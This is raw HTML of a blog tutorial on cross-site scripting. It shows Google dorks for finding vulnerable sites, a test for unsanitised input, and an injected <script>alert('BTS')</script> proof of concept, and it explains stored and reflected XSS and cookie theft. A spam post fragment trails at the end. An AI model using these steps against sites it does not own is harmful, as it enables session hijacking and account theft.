font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and </span><span class="IL_AD" id="IL_AD9" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">change password</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">.It will be easy to understand XSS , if you have the following prerequisite:</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br />
<ul style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;">
<li style="margin: 0px 0px 0.25em; padding: 0px;">Strong Knowledge in HTML,javascript(<a href="http://w3schools.com/" rel="nofollow" style="color: #888888; text-decoration: none;">Reference</a>).</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Basic Knowledge in HTTP client-Server Architecure(<a href="http://101.lv/learn/CGIperl/ch2.htm" rel="nofollow" style="color: #888888; text-decoration: none;">Reference</a>)</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">[optional]Basic Knowledge about server side programming(php,asp,jsp)</li>
</ul>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span class="Apple-style-span" style="background-color: white; color: #38761d; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 19px; font-weight: bold;">XSS Attack:</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Step 1: Finding Vulnerable Website</b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability. </span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Step 2: Testing the Vulnerability:</b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja0byma54fJGG8idnecwhP3aQyz0C1LbQtS9c0tZTnjeM0EuIM5FuUXqVr18E1M45Di6d-uOIWawyOeYMJ6Ruat0FrY-KAD-cQMfkDQo79i8KENm4rPJFvqxtEIHUo0vPISVL76Mmp0u8/s1600/search+box.jpg" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja0byma54fJGG8idnecwhP3aQyz0C1LbQtS9c0tZTnjeM0EuIM5FuUXqVr18E1M45Di6d-uOIWawyOeYMJ6Ruat0FrY-KAD-cQMfkDQo79i8KENm4rPJFvqxtEIHUo0vPISVL76Mmp0u8/s1600/search+box.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><i>Test 1 :</i></b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXngL1NRorBv-7FFzAe_6YQIJ5OrpfrzWb2A-iuTILw-rDQdvEP1u2r5Cd6KQQ0c-ojMRFWab4s8DVUI_2W7xONdsLT_XMEj1r7elWDLP6O7o6Sc-f3dIjj-Z9S9ci3H9tjwm2vI_s9nw/s1600/XSS_input.gif" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXngL1NRorBv-7FFzAe_6YQIJ5OrpfrzWb2A-iuTILw-rDQdvEP1u2r5Cd6KQQ0c-ojMRFWab4s8DVUI_2W7xONdsLT_XMEj1r7elWDLP6O7o6Sc-f3dIjj-Z9S9ci3H9tjwm2vI_s9nw/s1600/XSS_input.gif" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" width="200" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg96oYtcvtFTAcXIl6eM8MuBszgLYKwDlR-r5E632GgaVlB3F74hZ24ZqDyQqwcAcfYdhbQDrLz5sEpYFHiYTiORfgqKFkCt0iBaO0b7lWZeaElEZ144wMV-m_q6WELRNK4YGWufXqFk/s1600/BTS_XSS.gif" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbg96oYtcvtFTAcXIl6eM8MuBszgLYKwDlR-r5E632GgaVlB3F74hZ24ZqDyQqwcAcfYdhbQDrLz5sEpYFHiYTiORfgqKFkCt0iBaO0b7lWZeaElEZ144wMV-m_q6WELRNK4YGWufXqFk/s1600/BTS_XSS.gif" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" width="200" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><i>Test 2:</i></b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field. </span><br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"></p>
<div class="separator" style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; clear: both; text-align: center; background-color: rgb(255, 255, 255);">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO4bnV0_W6J1gbexCQ1QquWobSZAilA1swX9lI5X_A-mJs0QoIGIwk-ERVldwiRvrBVoAAwXvChZlkRL8ZzZXSuiNU4jDgy6sGG-zOVCHsFAGVWa-P-wCvjFoBd_DqRU6H4c8KVAXnKvc/s1600/Xss_script_tag.gif" style="text-decoration: none; color: rgb(136, 136, 136); margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO4bnV0_W6J1gbexCQ1QquWobSZAilA1swX9lI5X_A-mJs0QoIGIwk-ERVldwiRvrBVoAAwXvChZlkRL8ZzZXSuiNU4jDgy6sGG-zOVCHsFAGVWa-P-wCvjFoBd_DqRU6H4c8KVAXnKvc/s1600/Xss_script_tag.gif" width="200" style="border: 1px solid rgb(238, 238, 238); position: relative; padding: 5px; -webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"></a></div>
<p>
<span style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);">View the source of the page . Find the location where input displayed place in previous test.</span><br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"></p>
<div class="separator" style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; clear: both; text-align: center; background-color: rgb(255, 255, 255);">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBZC118gbOJ-dnrWSPPLxOWm2zOSkwvn9s4vG8zm5uCXYD0tFYS4hsdTbyb-rtmwBUhBr5cbJvR_yywLEXfWIxgMs7IwIgDzfG-pZOSCa23vxB1-9yh3hyOpK0NQSdv-8anrVpDHh9C7A/s1600/xss-SUCCESS_Noparsing.gif" style="text-decoration: none; color: rgb(136, 136, 136); margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBZC118gbOJ-dnrWSPPLxOWm2zOSkwvn9s4vG8zm5uCXYD0tFYS4hsdTbyb-rtmwBUhBr5cbJvR_yywLEXfWIxgMs7IwIgDzfG-pZOSCa23vxB1-9yh3hyOpK0NQSdv-8anrVpDHh9C7A/s1600/xss-SUCCESS_Noparsing.gif" width="250" style="border: 1px solid rgb(238, 238, 238); position: relative; padding: 5px; -webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"></a></div>
<p>
<br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><span style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);">Thank god, our code is not being sanitized by the server and </span><span class="IL_AD" id="IL_AD6" style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);">the code</span><span style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"> is just same as what we entered in the field. If the server sanitize our input, the code may look like this </span><i style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><span class="Apple-style-span" style="color: rgb(153, 0, 0);"><script></span></i><span style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);">. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .</span><br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><b style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><span class="Apple-style-span" style="color: rgb(204, 0, 0);">Step 3: Exploiting the vulnerability</span></b><br style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);"><span style="color: rgb(102, 102, 102); font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; background-color: rgb(255, 255, 255);">Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUXdanup-U2NimSaHps0wS8zDCuNy6vNY2u0lR8CPr16c_hroyScgMNFuxZeIXEgFj1ADB_tXksA8wI2xRSuTUe24_lN3kETfQE6wKx7Ma2sSxonsgFuLTrI5XSQHmgUo9LrgUo17FEaM/s1600/injecting-XSS.gif" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="31" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUXdanup-U2NimSaHps0wS8zDCuNy6vNY2u0lR8CPr16c_hroyScgMNFuxZeIXEgFj1ADB_tXksA8wI2xRSuTUe24_lN3kETfQE6wKx7Ma2sSxonsgFuLTrI5XSQHmgUo9LrgUo17FEaM/s200/injecting-XSS.gif" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" width="200" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBJY2PNEIUDVKvtgjXzwJ99m_jaV2zSMNwe3rz4GD0lO7tV-eI2nMTuYz-TWDwClXctB5e_0ryqIAFzfUMEdXMX6dvkt4fd4fsGYuTCpnrjX_P3uLVjQYmRbAQdD55jcKE3TYzch8Biko/s1600/alert-box-xss.gif" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBJY2PNEIUDVKvtgjXzwJ99m_jaV2zSMNwe3rz4GD0lO7tV-eI2nMTuYz-TWDwClXctB5e_0ryqIAFzfUMEdXMX6dvkt4fd4fsGYuTCpnrjX_P3uLVjQYmRbAQdD55jcKE3TYzch8Biko/s1600/alert-box-xss.gif" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" width="200" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span class="Apple-style-span" style="background-color: white; color: #38761d; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 19px; font-weight: bold;">Types of XSS Based on persisting capability:</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><span class="Apple-style-span" style="color: #38761d;">Persistent XSS:</span></b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><i style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For Example:   </i><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of </span><span class="IL_AD" id="IL_AD5" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">your account</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><span class="Apple-style-span" style="color: #38761d;">Non-Persistent XSS:</span></b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return </span><span class="IL_AD" id="IL_AD8" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">the file</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><i style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Example:</i><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Let us consider a project </span><span class="IL_AD" id="IL_AD4" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">hosting</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><span class="Apple-style-span" style="color: #990000;">What can an attacker do with this Vulnerability?</span></b><br />
<ul class="checklist" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;">
<li style="margin: 0px 0px 0.25em; padding: 0px;">Stealing the Identity and Confidential Data(<span class="IL_AD" id="IL_AD3">credit</span> card details).</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Bypassing restriction in websites.</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Session Hijacking(Stealing session)</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Malware Attack</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Website Defacement</li>
<li style="margin: 0px 0px 0.25em; padding: 0px;">Denial of Service attacks(Dos)</li>
</ul>
<div style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<b><span class="Apple-style-span" style="color: #38761d;"></span></b><br /><div style="margin: 0px;">
<b><span class="Apple-style-span" style="color: #38761d;"><i><b>Bypassing The XSS Filter Technique: XSS Tutorial Part 2(Coming Soon..!!)</b></i></span></b></div>
<div>
<b><span class="Apple-style-span" style="color: #38761d;"><i><br /></i></span></b></div>
</div>
<div style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
</div>
<div style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<b><span class="Apple-style-span" style="color: #cc0000;">Disclaimer:</span></b></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This article is intended for educational purpose only.</span></div>
</div>

What is XSS (Cross Site Scripting)

What is XSS? Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to...

+ Read more »

Make money Without Blog.

<div dir="ltr" style="text-align: left;" trbidi="on">
Aha! The title looks spammy right? may be but you know Freelicenses and you know me and I will never ever recommend anyone anything without testing it.But this one really worked for me and I'm damn sure that it will work for you too.<br />
<br />
